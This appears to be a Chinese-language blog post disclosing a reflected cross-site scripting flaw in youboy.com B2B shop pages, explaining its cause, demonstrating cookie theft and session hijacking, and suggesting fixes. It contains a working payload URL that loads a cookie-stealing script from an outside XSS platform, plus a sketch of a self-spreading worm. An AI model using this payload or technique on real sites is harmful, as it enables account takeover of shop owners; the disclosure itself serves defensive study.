Author: Charlie
轉載請註明出處。
工作過程純粹手賤,測試了一下。然後發現了這麼一個東西。有心利用能造成大範圍影響。如可以自由修改用戶信息。
漏洞存在文件:*.b2b.youboy.com/framephoto.html 【用戶商鋪的framephoto.html 文件均存在】
成因:沒有對提交的參數 path 和 t 的值進行過濾就插入到網頁。
漏洞證明:
看到這裏,懂的同學就知道彈出那個框是什麼意思了。不懂的繼續往下看。看看它能幹嘛。
先看下面一張圖展示一個簡單的攻擊過程:
正常訪問應該如圖片中所示。提交用戶名密碼 -> 服務器驗證成功設置SESSION、Cookie -> Cookie存活時間內再次訪問後臺無需登陸
這個時候惡意用戶利用網頁的漏洞,構造了一個特殊的URL發送給受害者,只要受害者訪問後。Cookie 就被 惡意用戶竊取。
然後用Cookie 去訪問網站,這個時候網站就把惡意用戶當做 已經登錄的用戶處理。返回正常的後臺數據給惡意用戶。
:D 很好玩的東西。下面我用我的一臺VPS 當做受害者 , 我本機當做攻擊者,展示一下利用過程。
首先我們先在VPS 上登錄一個賬戶,假裝是正常的用戶,已經登陸了網站。如下:
這個時候我發送一條構造好的鏈接給他訪問【爲了方便我用XSS利用平臺代碼實現獲取Cookie過程】。
http://hgskyt.b2b.youboy.com/framephoto.html?path=http://b2b.youboy.com/img/b1.jpg&t=<script src=http://ixss.in//4T2wES?1384675589></script>URL中參數”t“值爲一段代碼,作用是加載惡意JS,JS功能是獲取Cookie,並傳送去一個服務器上。
下面我就假裝什麼都不知道,在VPS上打開這個網址。如下圖:
頁面看起來很正常。實際VPS上的Cookie已經被上傳到指定的地方了。如下圖:
下面就讓我們用這段Cookie在本地登錄看看
。看圖:http://ww2.sinaimg.cn/mw690/9d3d6499gw1eao4yyc070g20hs0dchdt.gif
特地錄了一段GIF。第一次我直接訪問個人商鋪後臺,提示登錄不成功。第二次,我攔截它發送的請求,然後把cookie替換成我們截取到的Cookie。
成功返回商鋪的數據。
只要設置本地cookie爲捕捉到的cookie,就可以登錄對方商鋪,爲所欲爲了。
假如利用JS自動進行POST數據修改 用戶的商鋪簡介,再插入 惡意鏈接到頁面。其它用戶再點擊,再感染,再傳播。。。就有蠕蟲的趕腳了。
修補:
1. 過濾特殊字符
2.可以考慮設置 httponly
測試環境:
本機 win8 64 + FireFox
VPS win2k3 32 + FireFox
之所以選用FireFox 是因爲如Chrome 瀏覽器能攔截部分XSS,容易影響測試。如下:
並不是說漏洞不存在,只是它屏蔽了。
。看圖:
